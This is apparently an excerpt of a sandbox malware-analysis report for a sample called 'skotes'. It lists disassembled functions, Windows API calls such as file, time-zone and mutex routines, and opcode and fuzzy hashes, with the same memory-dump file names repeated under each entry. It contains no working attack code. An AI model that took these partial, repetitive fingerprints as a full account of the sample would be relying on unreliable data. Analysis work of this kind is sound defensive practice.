Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
API String ID: 1721193555-3123340372
Opcode ID: 7c5cb323d27e3ad7503228dff99606d7be8fda519912b2c95be41f9afa48fcd6
Instruction ID: 326092b74b3bea64b077212f49acab91dccbbb3c7fc6662df17c7453aa54eda3
Opcode Fuzzy Hash: 7c5cb323d27e3ad7503228dff99606d7be8fda519912b2c95be41f9afa48fcd6
Instruction Fuzzy Hash: 5DE11574E21254DBDB14BB28DC4B79D7B61AB46720F9442CCE8156B3C2DB744EA48FC2

Function 002C1ABC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002C1775: CreateFileW.KERNEL32(00000000,00000000,?,002C1B65,?,?,00000000,?,002C1B65,00000000,0000000C), ref: 002C1792

__dosmaperr.LIBCMT ref: 002C1BD7
GetFileType.KERNEL32(00000000), ref: 002C1BE3
__dosmaperr.LIBCMT ref: 002C1BF6
__dosmaperr.LIBCMT ref: 002C1D9C

Strings

H, xrefs: 002C1D21

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: __dosmaperr$File$CreateType
String ID: H
API String ID: 3443242726-2852464175
Opcode ID: e7e8808a8bb66aac7d26392b6e48f5a576be314e6037e5ddc462d93bd59d191b
Instruction ID: 7b2dbdc543e3c7241831ad953f15bc397ac5f928593890cf3dd314d58bb8cfc2
Opcode Fuzzy Hash: e7e8808a8bb66aac7d26392b6e48f5a576be314e6037e5ddc462d93bd59d191b
Instruction Fuzzy Hash: 68A11832A241558FCF19DF68DC92BAD3BA1AF07324F14025DE812AF292DB759D32CB51

Function 002C26F2 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,002D6758), ref: 002C275C

Strings

Eastern Summer Time, xrefs: 002C27FA
Eastern Standard Time, xrefs: 002C27CB
Xg-, xrefs: 002C2705, 002C270B

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID: Eastern Standard Time$Eastern Summer Time$Xg-
API String ID: 565725191-2449143355
Opcode ID: d9b8b4f54bc28f7a1b79488537255630f41383040a7a37959746bf342c2005b3
Instruction ID: 31dbeac0f7e3c0f992dc1818d8bb70b7fd5039428b908826f1d70a419ef37c1e
Opcode Fuzzy Hash: d9b8b4f54bc28f7a1b79488537255630f41383040a7a37959746bf342c2005b3
Instruction Fuzzy Hash: 58514A71820255EBDB10EF64DC85EAEB7BCEF51360B10036EE514A7191EF709E698F60

Function 002B6FB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,002B6EE6), ref: 002B6FD6
GetFileInformationByHandle.KERNEL32(?,?), ref: 002B7030
__dosmaperr.LIBCMT ref: 002B70C5

Part of subcall function 002B732A: __dosmaperr.LIBCMT ref: 002B735F

Strings

n+, xrefs: 002B6FCE

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID: n+
API String ID: 2531987475-3019058165
Opcode ID: af42b5fc9c27e6658a5c4635a7c5962eb7b7e9eb7560773578e3f1356ea1ea8a
Instruction ID: 1b12ce03d9e307b7dea9423bb3f2a20fceb5b964cdaee36ab192decbb6adfeb3
Opcode Fuzzy Hash: af42b5fc9c27e6658a5c4635a7c5962eb7b7e9eb7560773578e3f1356ea1ea8a
Instruction Fuzzy Hash: 6F417E71924209AFDB24EFB5DC419EFB7F9EF88340B10492EF856D3610E6309950DB61

Function 00289BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00289BA8
Sleep.KERNEL32(00000064,?), ref: 0028A963
CreateMutexA.KERNEL32(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2.
API String ID: 396266464-2773616320
Opcode ID: 5bbdbf434b9b5acb9c6fc5ff00d8265306fe7a90dfe730410430d131d56b756b
Instruction ID: 5a5c47d63f25535017dadf8e99bbbf83bef99f96655c92cc4c30f062cbc2b1cd
Opcode Fuzzy Hash: 5bbdbf434b9b5acb9c6fc5ff00d8265306fe7a90dfe730410430d131d56b756b
Instruction Fuzzy Hash: 33319B317292048BFB08FB78DDC976DB766EF85318F284219E005973D1CB7659E08712

Function 00289CDA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00289CDD
Sleep.KERNEL32(00000064,?), ref: 0028A963
CreateMutexA.KERNEL32(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2.
API String ID: 396266464-2773616320
Opcode ID: b21ed9949a38811000791f33e227c78b3048267ba81e20a4763780dc93080e93
Instruction ID: 1996c261bc9cce7ab9c1c47a2b88fb1e5dc36ec7bbd3e2c157db7a4239d7d1cc
Opcode Fuzzy Hash: b21ed9949a38811000791f33e227c78b3048267ba81e20a4763780dc93080e93
Instruction Fuzzy Hash: AF3166316291048BFF08FBB8D8C87ACB766EF86314F284619E015973D1CB7599A08B12

Function 00289F44 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 137sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00289F47
Sleep.KERNEL32(00000064,?), ref: 0028A963
CreateMutexA.KERNEL32(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
